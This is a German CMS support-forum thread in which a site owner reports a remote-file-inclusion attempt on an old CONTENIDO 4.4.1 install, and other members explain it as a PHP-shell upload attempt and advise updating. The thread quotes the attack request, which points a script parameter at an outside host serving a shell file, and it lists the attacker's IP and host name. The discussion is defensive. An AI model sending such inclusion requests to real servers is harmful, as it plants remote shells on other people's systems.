CONTENIDO Forum

Das ist der Aufruf:

/contenido/external/frontend/contac.php?page[path][includes]=http://www.domainnichtvonmir.de/conteni ... r57rex.txt??

Ist auf einer alten 4.4.1 passiert.

Gruß MyAccount

zu dem Thema findest du so einiges hier im Forum.
Ein Update des Contenidos zumindest auf die aktuellste 4.4.x wäre ratsam, wa?

MyAccount hat geschrieben:Das ist der Aufruf:

/contenido/external/frontend/contac.php?page[path][includes]=http://www.domainnichtvonmir.de/conteni ... r57rex.txt??

Ist auf einer alten 4.4.1 passiert.

Gruß MyAccount

JA !!!

Da wurde eine php-Shell installiert oder versucht zu installieren.
Gehe davon aus das die Installation funktioniert hat und du nun einen Untermieter auf deinem Webspace beherbergst.

Was kannst du machen?

Steht hier:
http://www.contenido.de/forum/viewtopic.php?p=102073

Und natürlich den Rat von @MichFress befolgen.

Es wäre vielleicht sinnvoll einen Beitrag dazu:
Was mache ich wenn ...
in Tipps und Tricks zu schreiben.
Eigentlich ist der Rat immer der gleiche.

Danke Junges,

hehe mein Provider war so nett, dass sofort zu checken. Naja, es ist bei dem Versuch geblieben. Also die hatten definitiv KEINEN ERFOLG. Pfui. Saubande....

HTTP_USER_AGENT: libwww-perl/5.76

REMOTE_ADDR: 217.160.216.138

REMOTE_HOST: telemed-consult.de

Da kam es übrigens her.

Trotzdem vielen lieben Dank. Ich werde die Tage ein Update fahren.

MyAccount hat geschrieben: REMOTE_HOST: telemed-consult.de

Du solltest den Provider von telemed-consult.de informieren.
Denn wenn der Angriff von dort kam ist er in der Hand der Bande.
Und die werden dort alles mögliche anstellen und verschicken.

Dir wurde geholfen, nun helfe bitte dem Ahnungslosen.

Der Provider ist 2oder2 Waren die nicht in der letzten Woche in den Schlagzeilen, weil bei denen massenhaft die Server gehakt wurden?!

Ich würde ja gerne so ehrenhaft sein, aber ich glaube dass man von denen nicht einmal jemanden erreicht, wenn man da Kunde ist, oder?! Ich werde mal versuchen den Eigentümer der Domain anzumailen.